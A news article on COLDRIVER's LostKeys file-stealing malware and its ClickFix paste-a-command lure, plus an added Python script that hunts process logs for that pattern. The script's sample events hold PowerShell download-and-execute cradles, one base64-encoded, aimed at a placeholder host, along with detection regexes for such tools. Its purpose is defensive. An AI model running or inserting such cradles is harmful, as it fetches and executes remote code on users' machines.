Russian Hacker Group “COLDRIVER” Deploys Sophisticated “LostKeys” Malware in Targeted Attacks
Russian state-sponsored hacking group COLDRIVER, also known as Star Blizzard, Callisto, or Blue Callisto, has been observed deploying a new sophisticated malware called “LostKeys” in highly targeted attacks against select victims, according to recent findings from Google’s Threat Analysis Group (TAG).
The malware, which appears to be used selectively in COLDRIVER's espionage operations, is primarily a data theft tool built to exfiltrate documents and system information from compromised hosts. Malware deployment remains the exception for this group, whose operations have historically centred on credential phishing; LostKeys is not its first custom implant, since Google reported the group's SPICA backdoor in January 2024, but it shows that the actor is willing to move beyond credential theft against victims it considers high value.
“While COLDRIVER has historically focused on credential phishing, TAG has observed the group using malware in select cases,” Google researchers explained in their report. Google's analysis describes LostKeys as a file stealer: it collects files matching a hard-coded list of extensions and directories and sends them, together with system information and a list of running processes, back to the attackers.
Security researchers have identified that COLDRIVER's initial infection vector is a social engineering campaign rather than an exploit. According to The Hacker News, the group has been “using a fake browser update page called ‘ClickFix’ to trick users into downloading and installing the malware.” ClickFix is the name of the technique rather than of a page: the lure (in the LostKeys campaign, a fake CAPTCHA verification page) instructs the victim to copy a command to the clipboard and paste it into the Windows Run dialog, so the first-stage PowerShell is launched by the user's own hands and no browser or document exploit is needed. This approach shows the group's continued reliance on social engineering while it expands its technical capabilities.
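Because the ClickFix step is the user pasting a command into the Run dialog, the most reliable telemetry is process lineage: explorer.exe (which services the Run dialog) spawning powershell.exe with a hidden window, an encoded command or a download-and-execute cradle. The following is an added example, not code from the original article or from Google's report, that scores constructed Sysmon-style process-creation records for that pattern; the sample command lines, hostnames and field names are constructed for illustration and are not indicators from the campaign.

```python
"""Hunt Sysmon-style process-creation records for ClickFix-pattern execution:
an interactive shell (explorer.exe, i.e. the Run dialog) launching PowerShell
with a hidden window, an -EncodedCommand payload, or a download/execute cradle.
Added example; the events below are constructed, not real telemetry."""
import base64
import binascii
import re
from dataclasses import dataclass, field
from typing import List, Optional


def _enc(ps: str) -> str:
    """Encode a command the way PowerShell's -EncodedCommand expects (UTF-16LE, base64)."""
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"

# Constructed sample records with Event ID 1-like fields (parent, image, cmdline).
SAMPLE_EVENTS = [
    # 1. Run-dialog paste: hidden window plus in-memory download-and-execute cradle.
    {"parent": EXPLORER, "image": PS,
     "cmdline": "powershell -w hidden -nop -c \"iex (iwr 'https://lure.example.invalid/stage1' -UseBasicParsing)\""},
    # 2. Same lineage, cradle hidden behind -EncodedCommand.
    {"parent": EXPLORER, "image": PS,
     "cmdline": "powershell -ep bypass -enc "
                + _enc("IEX (New-Object Net.WebClient).DownloadString('https://lure.example.invalid/stage1')")},
    # 3. Benign: developer running a build script from an IDE terminal.
    {"parent": r"C:\Users\dev\AppData\Local\Programs\Microsoft VS Code\Code.exe", "image": PS,
     "cmdline": "powershell -NoProfile -File .\\build.ps1"},
    # 4. Benign: scheduled task under svchost, no cradle.
    {"parent": r"C:\Windows\System32\svchost.exe", "image": PS,
     "cmdline": "powershell.exe -NonInteractive -Command Get-Date"},
]

# -e, -ec, -en, -enc, ... -encodedcommand followed by a base64 blob.
ENCODED_ARG = re.compile(r"(?i)(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})")
HIDDEN_WINDOW = re.compile(r"(?i)-w(?:indowstyle)?\s+h(?:idden)?\b")
DOWNLOAD_CRADLE = re.compile(
    r"(?i)\b(?:iwr|irm|Invoke-WebRequest|Invoke-RestMethod|DownloadString|DownloadFile|Net\.WebClient|curl|wget)\b")
EXEC_CRADLE = re.compile(r"(?i)\b(?:iex|Invoke-Expression)\b")
INTERACTIVE_PARENTS = {"explorer.exe"}


@dataclass
class Finding:
    cmdline: str
    decoded: Optional[str]
    reasons: List[str] = field(default_factory=list)

    @property
    def score(self) -> int:
        return len(self.reasons)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext of an -EncodedCommand argument, or None if absent or undecodable."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw.decode("utf-16-le", errors="ignore")


def analyze_event(event: dict) -> Finding:
    cmdline = event["cmdline"]
    decoded = decode_encoded_command(cmdline)
    # Content checks run over the raw line and, when present, the decoded payload.
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    reasons = []
    parent = event["parent"].rsplit("\\", 1)[-1].lower()
    if parent in INTERACTIVE_PARENTS:
        reasons.append("powershell spawned by explorer.exe (Run dialog lineage)")
    if decoded is not None:
        reasons.append("-EncodedCommand used")
    if HIDDEN_WINDOW.search(text):
        reasons.append("hidden window requested")
    if DOWNLOAD_CRADLE.search(text):
        reasons.append("network download cradle")
    if EXEC_CRADLE.search(text):
        reasons.append("in-memory execution (IEX)")
    return Finding(cmdline=cmdline, decoded=decoded, reasons=reasons)


def hunt(events, threshold: int = 3) -> List[Finding]:
    """Return findings scoring at or above the threshold, highest score first."""
    hits = [f for f in (analyze_event(e) for e in events) if f.score >= threshold]
    return sorted(hits, key=lambda f: f.score, reverse=True)


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"[{f.score}] {f.cmdline[:72]}")
        for r in f.reasons:
            print("    -", r)
        if f.decoded:
            print("    decoded:", f.decoded)
```

The threshold of three indicators keeps single-feature hits (an encoded command from a management agent, an IDE launching PowerShell) out of the alert queue while both constructed ClickFix records score four. On a real estate the same logic applies to PowerShell script block logs (Event ID 4104), which capture the decoded command directly, and to the RunMRU registry key, which retains the pasted text as a forensic artifact.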
The malware deployment follows a multi-stage process. As detailed by Infosecurity Magazine, “Once installed, the malware establishes persistence, steals data from the device, and communicates with command-and-control servers.” Google's analysis adds an anti-analysis step early in the chain: before fetching the final payload, the second stage hashes the device's display resolution and aborts if the value matches a known list, a cheap check intended to keep the malware off sandboxes and virtual machines. The stolen information includes browser cookies, authentication tokens, and other sensitive data that could give the attackers prolonged access to victims' accounts even after the original session ends.
COLDRIVER’s targets remain consistent with their previous operations, focusing primarily on governments, NGOs, think tanks, military organizations, and academic institutions. SecurityWeek reports that the group has specifically targeted “individuals associated with intelligence, defense, and foreign policy” across Europe and North America.
What makes LostKeys particularly concerning is its stealthy nature. According to SecureWorld, the malware “is designed to operate quietly in the background, avoiding detection while it harvests sensitive information.” This low profile, combined with COLDRIVER's choice to deploy malware only against a small number of targets, limits the samples available to defenders and reflects deliberate operational security on the actor's part.
Security Affairs notes that COLDRIVER has been active since at least 2019 and is known for its “carefully crafted spear-phishing emails” that often impersonate legitimate individuals to gain the trust of their targets. The addition of the LostKeys malware to their arsenal represents a significant expansion of their capabilities.
Cybersecurity experts recommend that organizations implement multi-factor authentication (ideally phishing-resistant methods such as FIDO2 security keys, since COLDRIVER's credential phishing is built to harvest passwords and one-time codes), conduct regular security awareness training that specifically covers ClickFix-style “paste this command” lures, and deploy endpoint protection capable of detecting stealthy malware. Because the initial stage is a user-launched PowerShell command, enabling PowerShell script block logging and alerting on explorer.exe spawning PowerShell with hidden windows or download cradles gives defenders a detection point that does not depend on recognizing the final payload.
“This development underscores the evolving threat landscape where sophisticated state-sponsored actors continuously refine their techniques,” Hide.me’s security blog states. “Organizations must remain vigilant and adapt their defenses accordingly.”
As geopolitical tensions continue to rise, cybersecurity professionals anticipate that COLDRIVER and similar state-sponsored groups will continue to enhance their capabilities and expand their targeting scope, making robust cybersecurity practices more crucial than ever for potential targets.